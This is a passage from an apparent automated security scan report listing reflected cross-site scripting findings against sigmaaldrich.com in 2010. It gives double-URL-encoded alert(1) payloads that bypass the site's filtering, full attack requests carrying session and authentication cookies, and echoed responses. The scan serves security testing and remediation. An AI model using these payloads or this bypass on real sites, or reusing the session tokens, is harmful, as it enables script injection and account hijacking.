Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 28984
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service/technical-service-home/literature-requesta171f";alert(1)//b6d51f297e","E404") ;
   </script>
...[SNIP]...

1.228. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a34d2%2522%253balert%25281%2529%252f%252f0001c9fecf9 was submitted in the REST URL parameter 1. This input was echoed as a34d2";alert(1)//0001c9fecf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenta34d2%2522%253balert%25281%2529%252f%252f0001c9fecf9/sigma-aldrich/the-americas/united-states HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:22 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenta34d2";alert(1)//0001c9fecf9/sigma-aldrich/the-americas/united-states","E404") ;
   </script>
...[SNIP]...

1.229. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c7%2522%253balert%25281%2529%252f%252fb001a96c5d1 was submitted in the REST URL parameter 2. This input was echoed as d27c7";alert(1)//b001a96c5d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd27c7%2522%253balert%25281%2529%252f%252fb001a96c5d1/the-americas/united-states HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:24 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd27c7";alert(1)//b001a96c5d1/the-americas/united-states","E404") ;
   </script>
...[SNIP]...

1.230. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d444%2522%253balert%25281%2529%252f%252f92793edcdff was submitted in the REST URL parameter 3. This input was echoed as 3d444";alert(1)//92793edcdff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas3d444%2522%253balert%25281%2529%252f%252f92793edcdff/united-states HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas3d444";alert(1)//92793edcdff/united-states","E404") ;
   </script>
...[SNIP]...

1.231. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c25b4%2522%253balert%25281%2529%252f%252f8180bf336f was submitted in the REST URL parameter 4. This input was echoed as c25b4";alert(1)//8180bf336f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-statesc25b4%2522%253balert%25281%2529%252f%252f8180bf336f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-statesc25b4";alert(1)//8180bf336f","E404") ;
   </script>
...[SNIP]...

1.232. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf93%2522%253balert%25281%2529%252f%252fd613d4dcd48 was submitted in the REST URL parameter 1. This input was echoed as aaf93";alert(1)//d613d4dcd48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentaaf93%2522%253balert%25281%2529%252f%252fd613d4dcd48/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
